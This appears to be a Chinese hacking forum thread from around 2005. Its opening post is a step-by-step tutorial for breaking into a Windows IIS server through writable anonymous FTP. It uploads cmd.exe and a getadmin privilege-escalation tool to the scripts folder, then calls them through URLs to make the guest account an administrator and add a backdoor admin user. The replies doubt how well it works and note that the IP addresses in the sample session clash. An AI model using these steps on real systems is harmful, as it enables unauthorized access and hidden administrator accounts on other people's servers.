匿名FTP入侵

假设一台电脑ip 192.188.1.1开放FTP服务
在”运行“里输入”CMD“
输入 ftp 192.188.0.183回车：
Connected to 192.188.1.1
220 phoenix-r Microsoft FTP Service (Version 5.0).
User (192.188.0.183none)):anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
password输入任何字符+@,是不显示的）
230-你好
230-欢迎来到XXX的FTP站点
230 User anonymous logged in.
FTP>
进入了
输入cd /script如果改变目录成功的话就有很大的胜算了
然后将自己的cmd.exe和getadmin.exe(一个提升权限的工具)复制到对方的scripts目录
用命令put就可以了
接着输入:
FTP>bye
221 拜拜，欢迎下次再来
退出了，呵呵，还欢迎我下次再来入侵
不知道大家看到没有，上面的一大段中出现了计算机名的----phoenix-r ，所以匿名用户的名称便是IUSR——phoenix-r （这是个常识）
然后在浏览器中输入http://192.188.1.1/scripts/getadmin.exe?iusr_phoenix-r
如果返回CGI Error
就已经成功地将IUSR——phoenix-r 提升为了管理员
然后添加用户:
http://192.188.1.1/scripts/cmd.exe?/c%20c:\\winnt\\system32\\net.exe%20sword%20sword%20/add
http://192.188.1.1/scripts/getadmin.exe?sword
这样我就添加了一个叫sword的密码也为sword用户
并提升权限为了管理员
这样就成功地入侵了
以上的前提是一些粗心的管理员没有禁止guest用户，而且匿名权限为”写入“
这样我才可以成功入侵，还有就是匿名帐号是anonymous

：）

真有这样的是吗！？
没那么容易 吧！
现在的密码都是 加你又加
还真有这样的人啥！

晕倒
  现在的网管人员一个比一个贼
     我都不知道找到几个这样的机器了
但是 权限不够 连个cd到c都无法完成 还玩个p啊

下面引用由lopo1983在 2005/08/26 04:50pm 发表的内容：
真有这样的是吗！？
没那么容易 吧！
现在的密码都是 加你又加
还真有这样的人啥！

对我这样的鸟来说是最好的初级教程

还是看不懂是什么东东。

输入 ftp 192.188.0.183回车：
Connected to 192.188.1.1
220 phoenix-r Microsoft FTP Service (Version 5.0).
User (192.188.0.183none)):anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
password输入任何字符+@,是不显示的）
靠，到底是192.168.1.1还是192.188.0.183啊？

以前听过一个FTP漏洞，是wu2.X版的，直接用FTP，FTP登录就是超管权限！